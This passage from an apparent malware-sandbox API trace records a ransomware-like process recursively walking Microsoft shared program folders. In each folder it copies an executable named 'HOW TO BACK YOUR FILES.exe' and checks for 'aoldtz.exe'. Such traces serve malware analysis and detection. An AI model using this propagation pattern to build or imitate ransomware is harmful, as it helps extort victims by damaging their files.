shared\\Web Server Extensions\\14\\BIN") returned 81 [0056.742] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN" [0056.742] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.742] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.747] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.748] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53531c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53531c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.748] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.748] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.748] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO" [0056.748] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1a88 | out: hHeap=0x2b0000) returned 1 [0056.748] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0056.748] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO") returned 57 [0056.748] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO" [0056.748] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.748] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.754] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.754] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274de510, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53557d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53557d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.754] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.754] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.755] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0" [0056.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0056.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0056.755] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0") returned 62 [0056.755] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0" [0056.755] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.755] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.761] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.761] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274de510, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53557d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53557d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.761] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.761] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.761] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033" [0056.761] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0056.761] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0056.761] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned 67 [0056.761] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033" [0056.761] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.761] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.768] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.768] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5279f530, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5357dee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5357dee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.768] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.768] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.768] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA" [0056.768] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1a08 | out: hHeap=0x2b0000) returned 1 [0056.768] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0056.768] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA") returned 57 [0056.768] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA" [0056.768] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.768] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.774] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.774] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f4696f0, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x5357dee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5357dee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.775] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.775] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.775] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0" [0056.775] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0056.775] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0056.775] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0") returned 72 [0056.775] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0" [0056.775] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.775] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.780] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.780] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20323f10, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x5357dee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5357dee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.780] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.780] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.780] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters" [0056.780] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f088 | out: hHeap=0x2b0000) returned 1 [0056.780] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0056.780] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters") returned 89 [0056.780] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters" [0056.780] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.780] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.786] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.786] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x583906f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535a4040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535a4040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.786] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.786] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.786] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts" [0056.786] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e27c0 | out: hHeap=0x2b0000) returned 1 [0056.786] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0056.786] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts") returned 82 [0056.786] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts" [0056.786] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.786] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.791] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.791] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52328bf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535a4040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535a4040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.792] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.792] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.792] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews" [0056.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0056.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0056.792] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews") returned 83 [0056.792] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews" [0056.792] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.792] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.798] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.798] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69acfbd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535a4040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535a4040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.798] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.798] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.798] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters" [0056.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0056.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0056.798] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters") returned 90 [0056.798] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters" [0056.798] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.798] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.804] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.804] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5863dfb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535ca1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535ca1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.804] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.804] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.804] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument" [0056.804] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0056.804] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0056.804] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument") returned 73 [0056.804] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument" [0056.804] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.804] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.812] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.812] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535ca1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535ca1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.813] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.813] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.813] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument") 